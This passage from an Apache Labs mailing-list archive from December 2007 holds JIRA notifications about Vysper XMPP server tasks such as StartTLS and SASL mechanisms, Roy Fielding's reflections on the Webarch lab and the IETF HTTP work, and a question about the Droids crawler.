added to the classpath in the build file so if mina is not in the systems classpath the build fails. It would be really nice if the build just worked. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 22:05:07 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41370 invoked from network); 12 Dec 2007 22:05:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 22:05:05 -0000 Received: (qmail 95635 invoked by uid 500); 12 Dec 2007 22:04:54 -0000 Delivered-To: [email protected] Received: (qmail 95401 invoked by uid 500); 12 Dec 2007 22:04:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95392 invoked by uid 99); 12 Dec 2007 22:04:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 14:04:53 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 22:04:39 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 0695371422E for <[email protected]>; Wed, 12 Dec 2007 14:04:43 -0800 (PST) Message-ID: <5514577.1197497083017.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 14:04:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (LABS-105) refactor HandlerLookup In-Reply-To: <7915422.1194845511113.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-105?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Bernd Fondermann closed LABS-105. --------------------------------- Resolution: Fixed > refactor HandlerLookup > ---------------------- > > Key: LABS-105 > URL: https://issues.apache.org/jira/browse/LABS-105 > Project: Labs > Issue Type: Improvement > Components: Vysper > Reporter: Bernd Fondermann > Assignee: Bernd Fondermann > > the mechanisms how to look up a handler for an incoming stanza must be reworked. only the basic stanzas have a namespace on their top level element. for IQ stanzas, the relevant namespace is on the first second level element. the goal is to incorporate flexibility to handle this use cases. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 22:17:07 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87820 invoked from network); 12 Dec 2007 22:17:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 22:17:07 -0000 Received: (qmail 18951 invoked by uid 500); 12 Dec 2007 22:16:55 -0000 Delivered-To: [email protected] Received: (qmail 18842 invoked by uid 500); 12 Dec 2007 22:16:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18833 invoked by uid 99); 12 Dec 2007 22:16:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 14:16:54 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 22:17:04 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 0E0D571422E for <[email protected]>; Wed, 12 Dec 2007 14:16:43 -0800 (PST) Message-ID: <8756222.1197497803047.JavaMail.jira@brutus> Date: Wed, 12 Dec 2007 14:16:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (LABS-91) [vysper] Add StartTLS In-Reply-To: <9930056.1193605850652.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-91?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Bernd Fondermann closed LABS-91. -------------------------------- Resolution: Fixed Assignee: Bernd Fondermann implemented and working > [vysper] Add StartTLS > --------------------- > > Key: LABS-91 > URL: https://issues.apache.org/jira/browse/LABS-91 > Project: Labs > Issue Type: New Feature > Components: Vysper > Reporter: Bernd Fondermann > Assignee: Bernd Fondermann > > Implement StartTLS by adding a SSLFilter to the MINA session. See RFC 3920 section 5. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Dec 12 22:36:04 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55880 invoked from network); 12 Dec 2007 22:36:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Dec 2007 22:36:01 -0000 Received: (qmail 55353 invoked by uid 500); 12 Dec 2007 22:35:50 -0000 Delivered-To: [email protected] Received: (qmail 55220 invoked by uid 500); 12 Dec 2007 22:35:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55208 invoked by uid 99); 12 Dec 2007 22:35:49 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 14:35:49 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO spaceymail-a1.g.dreamhost.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Dec 2007 22:35:50 +0000 Received: from [161.129.204.104] (ip72-211-200-45.oc.oc.cox.net [161.129.204.104]) by spaceymail-a1.g.dreamhost.com (Postfix) with ESMTP id EEDEE818F7; Wed, 12 Dec 2007 14:35:27 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> Mime-Version: 1.0 (Apple Message framework v752.2) Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Cc: [email protected] Content-Transfer-Encoding: 7bit From: "Roy T. Fielding" <[email protected]> Subject: Re: [report] Apache Labs Date: Wed, 12 Dec 2007 14:35:25 -0800 To: [email protected] X-Mailer: Apple Mail (2.752.2) X-Virus-Checked: Checked by ClamAV on apache.org On Dec 12, 2007, at 11:34 AM, Stefano Mazzocchi wrote: > All it's quiet in Apache Labs. > > Some of the labs have some more or less steady activity and a few have > more than one people working on it, but nothing that has yet > reached the > point of requiring action on the evolution of the lab. > > - o - > > One interesting lab that somewhat differs from all the others is Roy's > Webarch (http://labs.apache.org/webarch/) which is now being used as > input for the work of the HTTP next-gen IETF working group. > > I was, in fact, very positively surprised to see a reference to > labs.apache.org from various blog posts on the future of HTTP and I > like > the fact that such links give credibility to labs. > > I feel the need to outline, though, that the "no release" rule for > labs > was created to avoid people from using labs as a way to route > around the > incubator, yet 'code-less' labs are able, in fact, to 'release' their > own documentation artifacts, without oversight or the need for a > community around the effort. Right, I have been pushing the envelope of labs in just about every direction, in part because this HTTP work is entirely harmless (everything has been published before elsewhere so can't jeopardize the ASF). > That said, I'm only outlining the existence of such issue but I do not > think this is currently creating a problem: the Webarch pages reflect > the labs.apache.org style and in doing so clearly mark the work as > 'experimental' or 'researchy', which is very similar than people > publishing stuff on their people.apache.org/~user/ pages and creates a > level of distance between any official apache position and the pages, > even if they are served off of *.apache.org domains. > > Let me repeat: I think that Webarch and code-less labs are a *good > thing* and should be encouraged in any way possible, as long as the > product of their effort is clearly marked as coming from a lab > (which is > the case for Webarch) and not used as a way to abuse the apache > branding > to give resonance to an individual committer's effort. > > I'm just mentioning this so that both labs@ and board@ consider this > food for thought and in no way I want such food for thought > endanger the > ability to use labs in the way Roy has done... but it's my duty, as > PMC > chair, to report changes in the project evolution that might > require, in > the future, board attention that this is the closest thing to that > (even > if, right now, does not require any action from any part and it's > unlikely that it will require any in the future either). Absolutely. (Good job, Stefano!) I should also point out that I made several attempts to use Jira with various levels of success, and would suggest that future labs be encouraged to create their own jira projects within the group Labs (rather than attempt to use the existing Labs project). I tried both, but jira is very much product-oriented and quickly becomes a mess even for unreleased products. However, I should also note that the IETF httpbis WG (or at least the chairs in consultation with the ADs) have decided that apache.org is not a sufficiently "neutral" player to host such work in the future, so my partitioned drafts, issues, and related stuff are presently being moved to tools.ietf.org. The webarch http lab has served its purpose, but is about to be closed (essentially graduating to a spec project on some SDO's infrastructure). As for the rest of webarch, I've pretty much concluded that it is pointless to host a project on infrastructure that doesn't allow the creation of project-specific mailing lists. Labs is a nice idea but is overly constrained. For example, consider the website issue. Is it really okay for me to just publish stuff like http://labs.apache.org/webarch/http/draft-fielding-http/ without it being considered a "release"? I honestly don't know. I mean, I know it is safe for me to do so given the nature of the content, but that may not be true for other labs, or even for webarch if I put the waka spec up on the site (the original plan). And what happens to that content when the lab is closed? The two main reasons for having it at Apache are so that others can work on it (e.g., Julian) and so that the version history is permanently available (for legal and historical reasons). I think that may have stretched the labs idea too far. In order for me to do webarch at Apache, I need a TLP with its own mailing lists, a stable location for subversion/jira/website URIs, and the ability to release "products" with licenses that are more lenient than the Apache License. I don't see a way of getting there from here. Creating my own SDO would be easier. ....Roy --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:00:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73724 invoked from network); 14 Dec 2007 14:00:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:00:08 -0000 Received: (qmail 27988 invoked by uid 500); 14 Dec 2007 13:59:55 -0000 Delivered-To: [email protected] Received: (qmail 27759 invoked by uid 500); 14 Dec 2007 13:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27741 invoked by uid 99); 14 Dec 2007 13:59:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 05:59:55 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:00:04 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 35C25714238 for <[email protected]>; Fri, 14 Dec 2007 05:59:43 -0800 (PST) Message-ID: <19971038.1197640783217.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 05:59:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-107) Add SASL PLAIN MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Add SASL PLAIN -------------- Key: LABS-107 URL: https://issues.apache.org/jira/browse/LABS-107 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann Assignee: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:00:12 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73993 invoked from network); 14 Dec 2007 14:00:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:00:10 -0000 Received: (qmail 28029 invoked by uid 500); 14 Dec 2007 13:59:56 -0000 Delivered-To: [email protected] Received: (qmail 27761 invoked by uid 500); 14 Dec 2007 13:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27746 invoked by uid 99); 14 Dec 2007 13:59:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 05:59:55 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:00:04 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 69CEE71423E for <[email protected]>; Fri, 14 Dec 2007 05:59:43 -0800 (PST) Message-ID: <27850716.1197640783431.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 05:59:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-108) Add SASL EXTERNAL mechanism MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Add SASL EXTERNAL mechanism --------------------------- Key: LABS-108 URL: https://issues.apache.org/jira/browse/LABS-108 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:02:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74633 invoked from network); 14 Dec 2007 14:02:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:02:08 -0000 Received: (qmail 31720 invoked by uid 500); 14 Dec 2007 14:01:57 -0000 Delivered-To: [email protected] Received: (qmail 31568 invoked by uid 500); 14 Dec 2007 14:01:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31559 invoked by uid 99); 14 Dec 2007 14:01:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 06:01:56 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:01:43 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A4639714238 for <[email protected]>; Fri, 14 Dec 2007 06:01:44 -0800 (PST) Message-ID: <10146351.1197640904669.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 06:01:44 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-109) Add SASL ANONYMOUS mechanism MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Add SASL ANONYMOUS mechanism ---------------------------- Key: LABS-109 URL: https://issues.apache.org/jira/browse/LABS-109 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann Assignee: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:04:06 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75479 invoked from network); 14 Dec 2007 14:04:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:04:05 -0000 Received: (qmail 32503 invoked by uid 500); 14 Dec 2007 14:03:54 -0000 Delivered-To: [email protected] Received: (qmail 32361 invoked by uid 500); 14 Dec 2007 14:03:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32351 invoked by uid 99); 14 Dec 2007 14:03:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 06:03:53 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:03:40 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F15AA714246 for <[email protected]>; Fri, 14 Dec 2007 06:03:43 -0800 (PST) Message-ID: <11628970.1197641023985.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 06:03:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (LABS-110) Add SASL DIGEST-MD5 mechanism MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Add SASL DIGEST-MD5 mechanism ----------------------------- Key: LABS-110 URL: https://issues.apache.org/jira/browse/LABS-110 Project: Labs Issue Type: Sub-task Components: Vysper Reporter: Bernd Fondermann -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:14:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80962 invoked from network); 14 Dec 2007 14:14:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:14:08 -0000 Received: (qmail 44695 invoked by uid 500); 14 Dec 2007 14:13:56 -0000 Delivered-To: [email protected] Received: (qmail 44583 invoked by uid 500); 14 Dec 2007 14:13:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44574 invoked by uid 99); 14 Dec 2007 14:13:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 06:13:56 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:13:40 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 11EC47141FD for <[email protected]>; Fri, 14 Dec 2007 06:13:43 -0800 (PST) Message-ID: <14787415.1197641623051.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 06:13:43 -0800 (PST) From: "Emmanuel Lecharny (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (LABS-96) Implement SASL authorization In-Reply-To: <5327746.1194078830779.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-96?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12551806 ] Emmanuel Lecharny commented on LABS-96: --------------------------------------- FYI, we have implemented SASL on the Directory project. As it is coupled with MINA, you might be interested to have a [email protected]. > Implement SASL authorization > ---------------------------- > > Key: LABS-96 > URL: https://issues.apache.org/jira/browse/LABS-96 > Project: Labs > Issue Type: New Feature > Components: Vysper > Reporter: Bernd Fondermann > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Dec 14 14:55:05 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96063 invoked from network); 14 Dec 2007 14:55:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2007 14:55:04 -0000 Received: (qmail 7858 invoked by uid 500); 14 Dec 2007 14:54:53 -0000 Delivered-To: [email protected] Received: (qmail 7628 invoked by uid 500); 14 Dec 2007 14:54:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7619 invoked by uid 99); 14 Dec 2007 14:54:53 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 06:54:52 -0800 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Dec 2007 14:54:39 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2154671423B for <[email protected]>; Fri, 14 Dec 2007 06:54:43 -0800 (PST) Message-ID: <29677508.1197644083132.JavaMail.jira@brutus> Date: Fri, 14 Dec 2007 06:54:43 -0800 (PST) From: "Bernd Fondermann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (LABS-96) Implement SASL authorization In-Reply-To: <5327746.1194078830779.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/LABS-96?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12551818 ] Bernd Fondermann commented on LABS-96: -------------------------------------- Emmanuel, thanks for the hint! Vysper already uses StartTLS from MINA. And it will definitively receive some injection from Directory when it gets to /real/ SASL mechanisms ;-). I will stick to PLAIN & ANONYMOUS at first to complete initial XMPP handshake soon. Do you want to give the other mechanisms a try at some time, now or later? If later, I would ping you if everything is nicely set up for it. > Implement SASL authorization > ---------------------------- > > Key: LABS-96 > URL: https://issues.apache.org/jira/browse/LABS-96 > Project: Labs > Issue Type: New Feature > Components: Vysper > Reporter: Bernd Fondermann > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Dec 15 17:04:38 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22148 invoked from network); 15 Dec 2007 17:04:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Dec 2007 17:04:37 -0000 Received: (qmail 69388 invoked by uid 500); 15 Dec 2007 17:04:26 -0000 Delivered-To: [email protected] Received: (qmail 69179 invoked by uid 500); 15 Dec 2007 17:04:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69170 invoked by uid 99); 15 Dec 2007 17:04:25 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 15 Dec 2007 09:04:25 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 15 Dec 2007 17:04:03 +0000 Received: by rv-out-0910.google.com with SMTP id k15so1372939rvb.54 for <[email protected]>; Sat, 15 Dec 2007 09:04:06 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; bh=gbK+XEsuC+6kLMCj25kokPflSNOPwMlh/2qncI7y4Zc=; b=egb7YAmcgePyF14moEAbioKFxFhYGFXN6vNOEZWo5/NFyv+a9k6ec5WRgWf5n+kGaX3AF6g+XF6pZA5+e7YA8lAHn5jPLqoKbgSdcsSz3V4GExkK/pk6ylwyIDlOfV3ek0zXaWEsPXFYyROxJg7lWuma4DAa423P9/FS7Qed9jk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=MdrL2Z/qkAXgm/PQGjm+kCF/0P13nGriFA1PRwjw6rgvkIofUrzg/6lw6Xc+PCDnsyYhX26iaINbOkDVPZNDey+zt9xZv6m9y6X3c+fTAIZdmDpmi95edDhXmXJrFuVYMKAI8DZsg0dsbIk53t0eyYOUvW3PwmKl95c9k1cz0dM= Received: by 161.129.204.104 with SMTP id l10mr505743rvf.78.1197738246527; Sat, 15 Dec 2007 09:04:06 -0800 (PST) Received: from ?161.129.204.104? ( [161.129.204.104]) by mx.google.com with ESMTPS id a78sm14457229pye.2161.129.204.104.04.03 (version=TLSv1/SSLv3 cipher=RC4-MD5); Sat, 15 Dec 2007 09:04:04 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 15 Dec 2007 12:00:18 -0500 From: Ryan McKinley <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: [email protected] Subject: [droids] current status? Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hello- I'm looking for a simple crawler to integrate with solr. Droids seems good, but I'm not sure where to start working. /trunk is empty, and I don't see posts since Feb. Any pointers? just use: http://svn.apache.org/repos/asf/labs/droids/branch/nutch/ ? thanks ryan --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Dec 16 17:48:08 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23563 invoked from network); 16 Dec 2007 17:48:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Dec 2007 17:48:08 -0000 Received: (qmail 93774 invoked by uid 500); 16 Dec 2007 17:47:57 -0000 Delivered-To: [email protected] Received: (qmail 93640 invoked by uid 500); 16 Dec 2007 17:47:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <labs.labs.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93631 invoked by uid 99); 16 Dec 2007 17:47:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 16 Dec 2007 09:47:56 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mo-p07-ob.rzone.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 16 Dec 2007 17:47:44 +0000 X-RZG-CLASS-ID: mo07 X-RZG-AUTH: z4gQVF2k7GZD04reQhMkhxs+ Received: from [161.129.204.104] (137.Red-88-17-1.dynamicIP.rima-tde.net [161.129.204.104]) by post.webmailer.de (klopstock mo46) (RZmta 14.6) with ESMTP id D03caajBGG3ilZ for <[email protected]>; Sun, 16 Dec 